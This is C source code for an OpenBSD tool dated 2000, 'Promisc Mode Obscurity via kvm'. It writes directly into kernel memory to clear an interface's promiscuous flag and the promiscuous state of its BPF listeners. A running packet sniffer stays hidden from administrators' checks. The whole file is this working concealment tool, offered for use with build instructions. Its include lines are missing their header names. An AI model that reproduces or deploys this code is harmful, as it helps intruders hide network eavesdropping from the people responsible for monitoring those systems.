/* * Name: Promisc Mode Obscurity via kvm * Date: May 23 03:46:51 2000 * Author: pIGpEN [ pigpen@s0ftpj.org, deadhead@sikurezza.org ] * * SoftProject Digital Security for Y2K * Sikurezza.org Italian Security Mailing List * * COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by * Poul-Henning Kamp but you can give me in return a coffee. * * Tested on: OpenBSD 2.6 kern#0 i386 * * cc obsd_obscura.c -lkvm */ #include #include #include #include #include #include #include #include #include #include #define Error(x) errx(EX_UNAVAILABLE, x); struct nlist list[] = { {"_ifnet"}, {NULL} }; void usage(char *arg) { printf( "OpenBSD - Promisc Total Obscurity\n" "---------------------------------\n\n" "Coded By pIGpEN / s0FtPj Y2k\n\n"); printf("%s \n", arg); exit(0); } void bpf_zero(kvm_t *kd, struct ifnet *ifp) { struct bpf_if ibpf; struct bpf_d dbpf, *pdbpf; int count = 0; kvm_read(kd, (u_long) ifp->if_bpf, &ibpf, sizeof ibpf); for(pdbpf = ibpf.bif_dlist; pdbpf; pdbpf = dbpf.bd_next) { kvm_read(kd, (u_long) pdbpf, &dbpf, sizeof dbpf); printf("#%d listener has %s promisc mode enabled", ++count, (!dbpf.bd_promisc) ? "no " : " "); if(dbpf.bd_promisc) { printf(" (changed)"); dbpf.bd_promisc = 0; kvm_write(kd, (u_long) pdbpf, &dbpf, sizeof dbpf); } putchar('\n'); } } int main(int argc, char **argv) { kvm_t *kd; struct ifnet_head ifh; struct ifnet ifc, *ifp; if(argc != 2) usage(argv[0]); if(!(kd=kvm_open(NULL, NULL, NULL, O_RDWR, argv[0]))) Error("kvm_open()"); if(kvm_nlist(kd, list) == -1) Error("kvm_nlist()"); if(!list[0].n_value) Error("checking n_value"); kvm_read(kd, list[0].n_value, &ifh, sizeof ifh); for(ifp = ifh.tqh_first; ifp; ifp = ifc.if_list.tqe_next) { kvm_read(kd, (u_long) ifp, &ifc, sizeof ifc); if(!strcmp(argv[1], ifc.if_xname)) { printf("%s found ... promisc mode ", ifc.if_xname); if(ifc.if_flags & IFF_PROMISC) { printf("(found)\n"); if(ifc.if_pcount) /* Like in FreeBSD version, you can do a * perfect thing by decreasing for each * descriptor found */ ifc.if_pcount = 0; ifc.if_flags &= ~IFF_PROMISC; kvm_write(kd, (u_long) ifp, &ifc, sizeof ifc); printf("BPF Analysis for %s interface\n", ifc.if_xname); bpf_zero(kd, &ifc); }else printf("(not found)\n"); }else printf("skipping -> %s\n", ifc.if_xname); } kvm_close(kd); return 0; }